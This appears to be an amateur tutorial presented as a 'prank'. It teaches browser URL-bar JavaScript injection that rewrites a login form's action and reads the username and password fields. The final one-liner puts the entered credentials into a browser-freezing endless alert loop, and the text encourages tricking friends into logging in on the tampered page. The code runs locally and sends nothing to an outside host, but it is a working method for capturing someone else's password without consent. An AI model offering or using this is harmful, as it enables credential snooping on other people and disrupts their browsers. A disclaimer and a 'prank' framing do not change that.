Basic Hacking: Javascript Injection Prank

Password Prank Javascript Injection

first things first, test it out. in the url bar type the following

javascript:alert("hello")

"oh my god it said hello to me" now try something like this

javascript:document.write("hello")

"oh my word a new page that says hello to me" don't worry, this is going somewhere now for some variables

javascript:void(a="hello); javascript:alert(a)

if your starting to understanding the concept you'll realize that somethings different. we set a variable to a and made it alert the value of a.

now heres where it gets more advanced. go to a page with a login form like gmail.com and type this into the url bar

javascript:alert(document.forms[0].action)

the document function as you might have guessed documents something. as for the forms[0], your asking for the form (a type of html tag for those who dont know) and the number 0 (the first one on the page). and the action is where the form submits too.

now what were to happen if we were to change this value through a void, try it

javascript:void(document.forms[0].action="http://www.google.com"); javascript:alert(document.forms[0].action)

oh wow it changed, but what does that mean? try clicking the log in button. there ya go. so, it just sends me to google big deal. keep reading, the pay off is comming.

so now try this, put something in the username box and something else in the password box (these will be comming up in a popup so dont put your real information if anyones around)

javascript:alert(document.forms[0].elements[0].value)

like before forms[0] gives you the first form. but now elements[0].value gives you what the first element contains. so now to accomplish our goal change the elements[0].value to elements[1].value. and then elements[2].value and so on and so forth until you find what you put in the username and what you put in the password.

now before we continue one last thing you need to learn.(warning this will freeze your browser, opening a different window is recommended)

javascript:while(1) alert("loop")

the while is basically a loop, it has other functions, but when doing while(1) the 1 is recognized as true, therefore while(1) generates a never ending loop.

and now for the final product, remember this can be done for any site with a form submission login (most sites), if your using gmail.com like me you'll find the two you're looking for are elements[7].value and elements[8].value. and now to put all ive shown you together.

javascript:void(document.forms[0].action="javascript:while(1) alert(document.forms[0].elements[7].value+' '+document.forms[0].elements[8].value)")

now look what happens when you try logging in, "OH MY GOD THATS MY USERNAME AND PASSWORD"

this method can be used for any website the has a form submission log in, most sites, but not all sites have exactly the same values, so you may need to tweak the forms[0] and the elements[7] and the elements[8] to something different depending on the site. you should be able to figure it out though.

now the meaning of this is a prank and only to be used with good, inexperienced friends.

For example, open up the site, put the injection in, and ask one of your friends to log in because you sent them something or you want to see their profile.
Password pops up, doesn't go away, everyone gets a good laugh.

I do not condone malicious hacking, this is only proof of theory, I will not be held accountable for what you use this knowledge for, yada yada I better not get in trouble yada yada. Have fun.

Sources: Erm, i made the script and this tutorial myself, and over the past year ive picked up random javascript on my own, so basically anything you might find on google: "javascript injections" can go here.